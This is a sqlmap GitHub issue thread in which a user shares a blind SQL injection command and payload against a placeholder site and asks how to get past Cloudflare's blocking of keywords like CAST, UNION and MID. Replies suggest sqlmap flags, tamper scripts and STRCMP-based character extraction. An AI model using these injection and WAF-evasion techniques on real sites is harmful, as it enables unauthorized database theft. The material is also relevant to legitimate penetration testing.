### ISSUE TITLE
Cloudflare block special words like CAST

### ISSUE THREAD

**Issue by madaxcr** [sqlmapproject/sqlmap#3734]
Hello guys,

I have a blind injection here:

./sqlmap.py -u "https://www.example.com/cajax/currency_converter/" --data="current_currency=USD&listing_id=5107&currency=XER" --random-agent -v 3  --timeout=999999 --level=5 --risk=3 --dbms=mysql -p listing_id --technique=b --tamper=equaltolike,symboliclogical

---
Parameter: listing_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: current_currency=USD&listing_id=50107 AND 8292=8292&currency=EUR
    Vector: AND [INFERENCE]
---

After manual testing I noticed that Cloudflare is blocking some special words like:
UNION, CAST, MID and I cannot dump database.

URL Encoding or doubleenc doesn't solve the issue.

I tried to replace MID with unhex(4d4944). Nothing helps here.

Are there any tricks left?

Thanks

**Comment by stamparm** [comment]
A) Please don't raise this kind of issues as this is purely your job to find (research) a way how to bypass (if doable) the WAF/IPS in the first place
B) In your case you can try `--no-cast`, `--no-escape` or combination of both. Also, usage of `--random-agent` is advisable. Other than that, as said, it is your job to find a way to bypass it

**Comment by madaxcr** [comment]
I understand. Thank you.

**Comment by madaxcr** [comment]
Is there an option in sqlmap to replace MID with STRCMP? Like below:

Known:
substring((select 'password'),1,1) = 0x70
substr((select 'password'),1,1) = 0x70
mid((select 'password'),1,1) = 0x70
New:
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

Thanks

**Comment by stamparm** [comment]
Nope. There is something similar in `tamper/substring2leftright.py`, but not this. You could actually use that tamper script and try to modify it to suite your needs
